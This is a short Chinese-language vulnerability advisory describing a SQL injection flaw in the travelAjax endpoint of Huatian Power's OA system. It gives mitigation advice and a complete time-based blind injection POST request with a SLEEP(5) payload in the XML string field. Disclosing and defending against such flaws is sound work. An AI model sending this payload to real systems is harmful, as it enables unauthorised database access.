漏洞描述
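华天动力协同办公系统（OA）的 /OAapp/bfapp/buffalo/travelAjax 接口存在 SQL 注入漏洞：从下方请求看，getFlightAmount 方法的 <string> 参数应是未经参数化处理就进入了 SQL 查询。示例采用基于时间的盲注（SLEEP(5)）进行验证，响应出现相应延迟即说明该参数被拼入查询语句；示例请求未携带会话 Cookie，但本页未说明该接口是否需要认证。防护建议：对该参数改用参数化查询（预编译语句）；在修复前限制对 /OAapp/bfapp/buffalo/ 路径的外部访问，并在 WAF 与访问日志中关注发往该路径、请求体 <string> 字段中带有 SLEEP、SELECT 等 SQL 关键字的 POST 请求。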
POST /OAapp/bfapp/buffalo/travelAjax HTTP/1.1
Content-Type: text/xml;charset=UTF-8
<buffalo-call>
<method>getFlightAmount</method>
<string>-1' AND (SELECT 8445 FROM (SELECT(SLEEP(5)))VlEC) AND 'iUle'='iUle</string>
</buffalo-call>